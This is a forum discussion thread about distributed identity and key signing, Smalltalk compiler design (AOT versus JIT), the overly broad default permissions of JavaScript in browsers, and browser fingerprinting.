understandability => malleability

Agreed: good default friendly security in distributed identities is hard to get. Scuttlebutt, NOSTR and Anytype are interesting experiments on that front, with the last one having the most friendly default experience for configuring your pass phrase.

Regarding the unfriendliness of Git and Jupyter’s JSON for storing document and their history, that’s why I use Lepiter, Markdeep and Fossil to have a human friendly format and storage/publishing repository. It requires technical knowledge, but it has been tested and welcomed in non technical and grassroots communities with good results so far, providing that there is some community facilitation to introduce such tech stack in community’s activities.

2 Likes

I like NOSTR’s general approach, though I’m not sure I trust the particular community that happens to be developing it (since they seem to be baking cryptocurrencies and “pay to play” into the relays, which is a big disincentive for me to get involved). Also I don’t know why they went with secp256k1 instead of Curve25519, which is built-in to standard Web stacks like Node.js. But I like the general idea of a) picking an elliptic curve cryptosystem, so the keys are tiny compared with PGP/GPG; b) each user generates their own keypair with no third party needed; c) your public key is your identity and it’s a copy-pastable line of hex; d) rely entirely on trusted introductions from other known individuals (web of trust) rather than centralised pay-for-play PKI, and that’s it, it’s done. If you want to post a document or data file and assert proof that it’s yours, all you need is about two lines of text to prefix it (your public key and the signature of the SHA2 of the file). That’s not too unfriendly - it could be made much better than, eg, GPG-encrypted email was.

I suspect a large part of the hard bit of doing cryptographically-signed data publishing, though, is getting reproducible binaries or canonical text formats. You can’t just wing it like you would with today’s Python or Javascript build systems.

2 Likes

PGP/GPG suffers from too much abstraction (among other issues). It presents itself as a system that automagically handled encryption and digital signatures, for users who don’t need to know how it works. But it’s much too complicated for most potential users. A more concrete implementation, as you describe, would perhaps work much better in practice. Users would have to know what keys look like and how they are used, but they would also see those keys every day and thus learn about them “on the job”.

I’d like to see Smalltalks with AOT native compilers in the image instead of JITs. JITs, I think, came about here due to the image and VM being predefined and not built with AOT native compilers in mind.

1 Like

When would you run an AOT compiler in a Smalltalk system? What would you gain compared to JIT? I do see the point of native vs. bytecode, but in the context of Smalltalk, AOT and JIT seem to be equivalent to me.

The AOT compiler would be in the image.

The image would contain two compilers (or one compiler with multiple targets).

  • One quick and simple compiler to bytecode.
  • One optimising compiler to native code.

This would allow for a much simpler VM, less low level code and would enable work on the compilers at the Smalltalk level instead of at the much harder and lower VM level.

When would you run the optimizing compiler, and on what?

Today’s Smalltalk implementations compile each method to bytecode after any edit. They process the bytecode via a JIT compiler when an expression is evaluated, specializing for (and caching) for specific method arguments.

You can’t do any of these optimizations at the single-method level because everything is dynamic in Smalltalk. So AOT would make sense only for evaluating an expression. But even then you wouldn’t get very far before having discovered specific method arguments to optimize for.

Huh?

(12345678901234)

Javascript, as a language, gives every function/method far too many permissions by default. The ‘self’ reference is fine, but every function also gets given a reference to the entire web page that it’s running in, and the computer that that web page is being browsed from. That’s an insanely high level of access to your personal computer to just hand out like candy to every server on the entire Internet! But Javascript was invented in the free-for-all 1990s when everyone was trying to copy Smalltalk and being wide open and programmable was seen as a virtue.

Then the next 30 years of Web browser development were all about slowly trying to stuff the contents of Pandora’s Turing Complete Box back into the Javascript engine of web browsers, by adding layers and layers of lockdown, on top of this far too permissive language core. See the multiple versions of filesystem apis as an example of just how disastrous this situation has now become. It’s considered more “trustworthy” for a web page to store private user data in a corporate database in the cloud than it is to store it on the user’s personal local hard drive! This is, literally, an insane result by any security or privacy metric. But it’s what the “too open by default and then progressive lockdown” browser development process has given us.

A good scripting language for a web browser would not only NOT give each function a reference to the entire web page… it would also VERY strictly minimize how many CPU cycles and stack frames a function could allocate. Since theft of electricity via cryptomining is a major cybersecurity problem today, we might as well solve that one too the right way.

(Assuming that “fewer permissions by default” is the right way, that is.)

1 Like

Wondering what the state of the art in security models for computing-in-the-open (web style) is. My impression is that all security models in existence are one of:

  1. battle-tested and known to be both insufficient and frustrating, depending on the use case
  2. ideas or prototypes

I’d love to proven wrong!

1 Like

Yep I think there’s lots of shiny gleaming theoretical approaches to security, and then there’s the banged-up battle-scarred veterans like Javascript and Microsoft Office which nobody loves, but which have the bruises to show exactly what went wrong, and which get the job done, or at least the part of it that trillion-dollar companies are willing to fund.

I don’t hate Javascript for surviving the Internet wars, but, I am foolish and hubristic enough to think that we ought to be able to distill some learned lessons from its complex and troubled evolution and try again with something that might not need as much scar tissue. That’s always the hope, of course. Whether it’s possible…

I mean we must be capable of learning something from the last 30 years of failed software engineering paradigms, and surely it can’t just be that “preventing disasters before shipping is impossible”? Surely it can’t be that?

1 Like

The role of Javascript for “browser fingerprinting” may also be mentioned here, and because JS is so pervasively in use, minority of folks who disable it for this reason single themselves out in the fingerprinting. Very hard to protect oneself properly against this invasive practice.

1 Like